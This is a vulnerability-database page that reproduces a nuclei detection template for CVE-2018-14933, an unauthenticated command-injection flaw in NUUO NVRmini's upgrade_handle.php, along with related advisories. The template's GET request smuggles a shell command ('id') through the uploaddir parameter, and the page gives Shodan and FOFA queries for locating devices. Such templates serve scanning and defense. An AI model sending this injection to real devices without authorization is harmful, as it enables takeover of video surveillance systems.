Lucene search
+L

NUUO NVRmini - Remote Command Execution

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

NUUO NVRmini allows unauthenticated remote command execution via upgrade_handle.php vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
NUUO NVRmini upgrade_handle.php Remote Command Execution Exploit
7 Feb 201900:00
zdt
attackerkb
CVE-2018-14933
4 Aug 201800:00
attackerkb
circl
CVE-2018-14933
7 Feb 201905:01
circl
cisa_kev
NUUO NVRmini Devices OS Command Injection Vulnerability
18 Dec 202400:00
cisa_kev
cisa
CISA Adds Four Known Exploited Vulnerabilities to Catalog
18 Dec 202412:00
cisa
cve
CVE-2018-14933
4 Aug 201819:00
cve
cvelist
CVE-2018-14933
4 Aug 201819:00
cvelist
exploitdb
NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)
11 Feb 201900:00
exploitdb
metasploit
NUUO NVRmini upgrade_handle.php Remote Command Execution
6 Dec 201802:51
metasploit
nessus
NUUO NVR Web Interface RCE
18 Oct 201700:00
nessus
Rows per page
id: CVE-2018-14933

info:
  name: NUUO NVRmini - Remote Command Execution
  author: ritikchaddha
  severity: critical
  description: |
    NUUO NVRmini is vulnerable to unauthenticated remote command execution through the upgrade_handle.php file. The vulnerability allows an attacker to execute arbitrary commands by manipulating the uploaddir parameter.
  impact: |
    Unauthenticated attackers can execute arbitrary commands on the NUUO NVRmini device by manipulating the uploaddir parameter in upgrade_handle.php, leading to complete device compromise and potential unauthorized access to video surveillance systems and recordings.
  remediation: |
    Update NUUO NVRmini to a patched version later than the 2016 firmware that properly validates the uploaddir parameter and restricts command execution.
  reference:
    - https://www.exploit-db.com/exploits/45070
    - https://www.cve.org/CVERecord?id=CVE-2018-14933
    - https://nvd.nist.gov/vuln/detail/CVE-2018-14933
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-14933
    cwe-id: CWE-78
    epss-score: 0.93746
    epss-percentile: 0.99831
    cpe: cpe:2.3:o:nuuo:nvrmini_firmware:2016:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nuuo
    product: nvrmini_firmware
    shodan-query: title:"NUUO"
    fofa-query: title="NUUO"
  tags: cve,cve2018,nuuo,rce,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fda583df735dd8ee5c3cf7d86bdde40c5c0c248371f7cba924276942ebe158fa0220081b050d906cf45d27de4c670354a9948d34955e0f5e0fc5bf38455fe4731e25:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
CVSS 210
EPSS0.93746
SSVC
24